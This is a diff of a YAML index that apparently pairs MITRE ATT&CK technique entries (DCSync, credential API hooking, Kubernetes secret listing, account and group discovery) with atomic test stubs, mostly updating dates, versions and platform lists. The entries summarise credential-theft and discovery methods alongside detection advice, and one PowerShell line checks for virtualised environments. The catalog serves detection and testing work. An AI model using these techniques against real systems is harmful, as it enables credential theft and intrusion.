-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -80767,21 +81429,83 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests:
     - name: DCSync (Active Directory)
@@ -80861,7 +81585,7 @@ credential-access:
         elevation_required: false
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -80874,6 +81598,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -80910,17 +81635,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -80966,81 +81691,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -81053,23 +81707,89 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests:
     - name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -81107,7 +81827,7 @@ credential-access:
         elevation_required: true
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -81164,9 +81884,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -81197,7 +81916,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -81221,8 +81940,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -81287,7 +82004,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests:
     - name: System Owner/User Discovery
@@ -81406,7 +82122,7 @@ discovery:
           '
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -81465,7 +82181,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -81486,7 +82201,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -81507,8 +82222,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests:
     - name: Check internet connection using ping Windows
@@ -81592,7 +82305,7 @@ discovery:
           '
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -81615,15 +82328,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -81649,13 +82361,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -81680,12 +82391,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -81727,13 +82437,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -81794,7 +82503,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests:
     - name: Display group policy information via gpresult
@@ -81885,7 +82593,7 @@ discovery:
         elevation_required: true
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -81949,7 +82657,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests:
     - name: Device Driver Discovery
@@ -81971,14 +82678,14 @@ discovery:
         elevation_required: false
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -82025,7 +82732,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests:
     - name: Enumerate all accounts (Domain)
@@ -82587,7 +83293,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests:
     - name: Enumerate all accounts on Windows (Local)
@@ -82640,7 +83345,7 @@ discovery:
         name: command_prompt
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -82730,13 +83435,12 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Windows)
@@ -82776,7 +83480,7 @@ discovery:
           if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
